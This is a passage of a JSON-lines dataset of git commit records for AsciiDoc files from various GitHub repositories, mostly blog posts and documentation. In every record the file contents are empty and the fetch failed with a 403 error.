Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-07-The12SmartWatchDoesItSuck.adoc","new_file":"_posts\/2017-12-07-The12SmartWatchDoesItSuck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e02c24027f0e5c24f45e9a3a5deb2585609d8bd","subject":"ISIS-2883: Demo: adds initial pre-flight protocol","message":"ISIS-2883: Demo: adds initial pre-flight protocol","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"examples\/demo\/pre-flight.adoc","new_file":"examples\/demo\/pre-flight.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6be6fc87458fdfadcfe09b7aa81536591b24f4eb","subject":"Fixed the load of fixtures.","message":"Fixed the load of fixtures.","repos":"uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"83a7dee3782f0e81f8eaeb9aef3691fb84ed671a","subject":"Dep-Git Ex","message":"Dep-Git Ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Divers\/Dep-Git.adoc","new_file":"Divers\/Dep-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8603ab77bfc9906dcf1affdd7b0b1c77d21537b","subject":"docs: update security doc on --redact flag usage","message":"docs: update security doc on --redact flag usage\n\nChange-Id: I5356aba4277fbea957289db2790ea1353bab4ba3\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8394\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56721d601d94d433b7478190ba09a0557fd6aa1d","subject":"Add notes on secure deployment","message":"Add notes on secure deployment\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"032ea6da1d4b9a9db644d81a4ff4aa8741a22864","subject":"Create test.adoc","message":"Create test.adoc","repos":"kdorff\/retropie-romfilter,kdorff\/retropie-romfilter","old_file":"docs\/test.adoc","new_file":"docs\/test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kdorff\/retropie-romfilter.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e3f0af275c0f4b5fbb70c8f3ae28ae358ee324c","subject":"y2b create post iPhone 6 Plus Unboxing (Shot With iPhone 6)","message":"y2b create post iPhone 6 Plus Unboxing (Shot With iPhone 6)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-19-iPhone-6-Plus-Unboxing-Shot-With-iPhone-6.adoc","new_file":"_posts\/2014-09-19-iPhone-6-Plus-Unboxing-Shot-With-iPhone-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0d02f88008b2dd68ea84be340736d792aaf811c","subject":"Update 2015-07-02-Hybris-E-commerce-suite.adoc","message":"Update 2015-07-02-Hybris-E-commerce-suite.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-02-Hybris-E-commerce-suite.adoc","new_file":"_posts\/2015-07-02-Hybris-E-commerce-suite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c95704bff4147410da408ffcd938dd337894b3da","subject":"Fixed unspecified allegory","message":"Fixed unspecified allegory\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2bbc6ae5dc98e4aceba01da7346688a25369f113","subject":"Update 2015-10-13-HDFS-tutorial.adoc","message":"Update 2015-10-13-HDFS-tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fa00dbcea990a1b3baf8f545a8d8effedfd3bd4","subject":"Update 2016-10-03-Roman-Weekend.adoc","message":"Update 2016-10-03-Roman-Weekend.adoc","repos":"cmhgroupllc\/blog,cmhgroupllc\/blog,cmhgroupllc\/blog,cmhgroupllc\/blog","old_file":"_posts\/2016-10-03-Roman-Weekend.adoc","new_file":"_posts\/2016-10-03-Roman-Weekend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmhgroupllc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be923ab8f7c79a00773c654ca86bb6a6b2ad17ae","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0e6ad849ca98211f21eb23ad2633d5494f94de0","subject":"Update 2017-11-08-api-blueprint.adoc","message":"Update 2017-11-08-api-blueprint.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-08-api-blueprint.adoc","new_file":"_posts\/2017-11-08-api-blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c15572c8fa6ebb7becd57578833d4ea9d391755","subject":"add a new readme","message":"add a new readme\n","repos":"ozlerhakan\/rapid,ozlerhakan\/rapid,ozlerhakan\/rapid","old_file":"react\/readme.adoc","new_file":"react\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ozlerhakan\/rapid.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b11e3c931c1ebd7e50982b6255b61f4a15e0ee79","subject":"Update 2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acc5544c17523d2387c9ce115c526e1f7577cdcc","subject":"Update 2018-05-18-I-was-involved-in-a-shocking-incident-and-want-to-talk-about-mental-health-and-what-were-doing-as-a-country-to-address-it.adoc","message":"Update 2018-05-18-I-was-involved-in-a-shocking-incident-and-want-to-talk-about-mental-health-and-what-were-doing-as-a-country-to-address-it.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2018-05-18-I-was-involved-in-a-shocking-incident-and-want-to-talk-about-mental-health-and-what-were-doing-as-a-country-to-address-it.adoc","new_file":"_posts\/2018-05-18-I-was-involved-in-a-shocking-incident-and-want-to-talk-about-mental-health-and-what-were-doing-as-a-country-to-address-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c02f5119e8926a4d23ba8c02303cf60f49923e0e","subject":"Started asciidoc based user guide.","message":"Started asciidoc based user guide.\n","repos":"miyakawataku\/jsr354-ri,miyakawataku\/jsr354-ri,msgilligan\/jsr354-ri,msgilligan\/jsr354-ri","old_file":"src\/main\/asciidoc\/userguide.adoc","new_file":"src\/main\/asciidoc\/userguide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/jsr354-ri.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"207cb0debaba186b304b931c94d921528d757bed","subject":"y2b create post Ultimate Portable Setup?","message":"y2b create post Ultimate Portable Setup?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-26-Ultimate-Portable-Setup.adoc","new_file":"_posts\/2015-08-26-Ultimate-Portable-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"895526ed706e28791cb25dd65ec550a045f6a3d6","subject":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf2ce9ce1585f5e1d816e12520da91561d3b0bb5","subject":"Update 2015-09-18-YourSingapore-Mobile-App.adoc","message":"Update 2015-09-18-YourSingapore-Mobile-App.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-YourSingapore-Mobile-App.adoc","new_file":"_posts\/2015-09-18-YourSingapore-Mobile-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f0dee1fe0bcb55c592c39a1db54f647d97fd98c","subject":"Update 2016-05-25-A-mozhet-nu-ego-etot-ORM.adoc","message":"Update 2016-05-25-A-mozhet-nu-ego-etot-ORM.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-25-A-mozhet-nu-ego-etot-ORM.adoc","new_file":"_posts\/2016-05-25-A-mozhet-nu-ego-etot-ORM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e5d910cf98b8c394c820d715803c66124409347","subject":"Add example document for attribute entries & their usage","message":"Add example document for attribute entries & their usage\n","repos":"edusantana\/asciidoc-highlight","old_file":"test\/issues\/14.adoc","new_file":"test\/issues\/14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/edusantana\/asciidoc-highlight.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d6f0d4af03ccc7d3cfd768e237c46c78e2bea76","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5517e86599360562f357b1e09304e894002a25c9","subject":"Update 2015-07-05-First-Rust-project-wf.adoc","message":"Update 2015-07-05-First-Rust-project-wf.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-05-First-Rust-project-wf.adoc","new_file":"_posts\/2015-07-05-First-Rust-project-wf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fd660db7a858987297e220dfa3c4ad94d860be4","subject":"Update 2016-05-03-Intellectual-Property.adoc","message":"Update 2016-05-03-Intellectual-Property.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-05-03-Intellectual-Property.adoc","new_file":"_posts\/2016-05-03-Intellectual-Property.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6132b0a1ac9191e88c8b395849b2af4b1bf772ca","subject":"Update 2016-11-15-Inky-Machine-Learning.adoc","message":"Update 2016-11-15-Inky-Machine-Learning.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2016-11-15-Inky-Machine-Learning.adoc","new_file":"_posts\/2016-11-15-Inky-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd3f3a850ed68015b1221aa7a589383e7728437b","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b323c5ed58d51576e67672fd92e331b799048cd6","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51bb0f68418382508038c97ba2d663defc0d38ab","subject":"job: #9893 introducing review minute template","message":"job: #9893 introducing review minute template\n","repos":"cortlandstarrett\/mc,leviathan747\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,keithbrown\/mc,keithbrown\/mc,rmulvey\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc,lwriemen\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,cortlandstarrett\/mc,keithbrown\/mc,xtuml\/mc,keithbrown\/mc,lwriemen\/mc,keithbrown\/mc,keithbrown\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,xtuml\/mc","old_file":"doc\/review-minutes\/9893_xtuml2masl_int_rvm.adoc","new_file":"doc\/review-minutes\/9893_xtuml2masl_int_rvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35688a5cb8902dae4458259171dc219236006275","subject":"Works on documentation","message":"Works on documentation\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/manpage\/tm_mib.adoc","new_file":"doc\/manpage\/tm_mib.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"39168abfef17e4d2f78c76294321e367bf8c4859","subject":"Trailing slashes for URL validation","message":"Trailing slashes for URL validation\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a939b56e60e7af96d947bd8d2a23e4b637d9551d","subject":"y2b create post Do You Even Cloud Bro?","message":"y2b create post Do You Even Cloud Bro?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-18-Do-You-Even-Cloud-Bro.adoc","new_file":"_posts\/2015-12-18-Do-You-Even-Cloud-Bro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3479e272a0ac6da8ecfc16d0c4ceeb7f783a7c7","subject":"Update 2017-02-20-Sala-de-Chat-Privado3.adoc","message":"Update 2017-02-20-Sala-de-Chat-Privado3.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-02-20-Sala-de-Chat-Privado3.adoc","new_file":"_posts\/2017-02-20-Sala-de-Chat-Privado3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7b57743f6fd5afec65ef81bf8595960dfe7088e","subject":"Installing Grails common snippet","message":"Installing Grails common snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-installingGrails.adoc","new_file":"src\/main\/docs\/common-installingGrails.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05a6654faa577a87150db644bf970db8952067cc","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cab88432ccd7e9d29821fe8e2dfce15878d2e167","subject":"fixed a silly mistake","message":"fixed a silly mistake\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week03.asciidoc","new_file":"asciidoc\/week03.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"936a2d44053376031ed8cfea25de3d810df003a4","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49e7c0d6192e7e4f15c9a4577e095c02b2e0b137","subject":"Update 2016-04-08-2016-04-06.adoc","message":"Update 2016-04-08-2016-04-06.adoc","repos":"nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io","old_file":"_posts\/2016-04-08-2016-04-06.adoc","new_file":"_posts\/2016-04-08-2016-04-06.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nichijo-chuka\/nichijo-chuka.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ff0bae9b7f59a3a1f0c116eda1d9bcd261a32b0","subject":"DOC: add page with user feedback","message":"DOC: add page with user feedback\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/feedback.adoc","new_file":"docs\/feedback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68069c28fe47148adff41e484062bcd40deeb8d3","subject":"added some POC for doc on website","message":"added some POC for doc on website\n","repos":"squirrelala\/Rainfall-core,cschanck\/Rainfall-core,cschanck\/Rainfall-core,cljohnso\/Rainfall-core,cljohnso\/Rainfall-core,squirrelala\/Rainfall-core,aurbroszniowski\/Rainfall-core,aurbroszniowski\/Rainfall-core","old_file":"src\/main\/doc\/index.adoc","new_file":"src\/main\/doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cschanck\/Rainfall-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df1485a47008a3cd0fe24e03ed6d9689c82e7362","subject":"Update 2015-11-26-Inverser-le-controle.adoc","message":"Update 2015-11-26-Inverser-le-controle.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-11-26-Inverser-le-controle.adoc","new_file":"_posts\/2015-11-26-Inverser-le-controle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d7ece3edd329488ffad045f3c8d4223335753a2","subject":"Update 2016-10-18-Le-Inicio-da-Marmota.adoc","message":"Update 2016-10-18-Le-Inicio-da-Marmota.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2016-10-18-Le-Inicio-da-Marmota.adoc","new_file":"_posts\/2016-10-18-Le-Inicio-da-Marmota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee5a6f1eb1007a1cbf20e20c6b56a123829d323f","subject":"link should be copyable, not clickable","message":"link should be copyable, not clickable\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"doc\/contributors-guide\/modules\/ROOT\/pages\/user\/add-eap-repository-to-ide.adoc","new_file":"doc\/contributors-guide\/modules\/ROOT\/pages\/user\/add-eap-repository-to-ide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-intellij-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"90ca525deb475b62d2ff256212637ee15c03c1df","subject":"BVAL-687 Adding final license","message":"BVAL-687 Adding final license\n","repos":"beanvalidation\/beanvalidation-spec,beanvalidation\/beanvalidation-spec,beanvalidation\/beanvalidation-spec","old_file":"sources\/license-final.asciidoc","new_file":"sources\/license-final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beanvalidation\/beanvalidation-spec.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81bea9667e78c55c9609e05d4909eb66bc85ccd4","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"quarkus\/microprofile-rest-client\/readme.adoc","new_file":"quarkus\/microprofile-rest-client\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 